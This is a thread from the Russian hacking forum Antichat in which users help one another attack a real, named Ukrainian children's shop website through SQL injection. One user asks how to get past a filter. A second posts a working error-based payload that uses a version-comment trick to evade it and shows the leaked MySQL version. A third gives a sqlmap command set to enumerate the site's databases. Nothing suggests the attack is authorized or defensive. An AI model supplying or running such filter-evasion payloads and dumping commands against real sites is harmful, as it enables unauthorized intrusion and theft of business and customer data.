Форум АНТИЧАТ - стоит защита, как обойти ?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - стоит защита, как обойти ? (https://forum.antichat.xyz/showthread.php?t=457566)

Sensoft

07.11.2017 02:03

стоит защита, как обойти ?

https://kidshop.com.ua/category/obuv...dlya-malchikov' тут SQL

https://kidshop.com.ua/category/obu...Value(1,concat(0x3a,(select(version())))))=' 1 не пропускает

kacergei

07.11.2017 11:15

Цитата:

Сообщение от Sensoft

Sensoft said:
↑
стоит защита, как обойти ?
https://kidshop.com.ua/category/obuv...dlya-malchikov
' тут SQL
https://kidshop.com.ua/category/obu...Value(1,concat(0x3a,(select(version())))))=' 1
не пропускает

Защита?

Код:

Code:

https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov'or(ExtractValue(1,/*!50000concat*/(0x3a,(select(version())))))='1

Результат:

XPATH syntax error: ':5.7.16-10-log'

Sensoft

07.11.2017 11:44

Цитата:

Сообщение от kacergei

kacergei said:
↑
Защита?

Код:

Code:

https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov'or(ExtractValue(1,/*!50000concat*/(0x3a,(select(version())))))='1

Результат:
XPATH syntax error: ':
5.7.16-10-log
'

случайно не знаешь как в мамп засунуть запрос чтобы тот всё вытащил ?

karkajoi

07.11.2017 15:29

пробуй вот так,

Код:

Code:

sqlmap --url "https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov'or(ExtractValue(1,/*!50000concat*/(0x3a,(select(*)))))='1" --dbs --risk=3 --level=5

Время: 16:18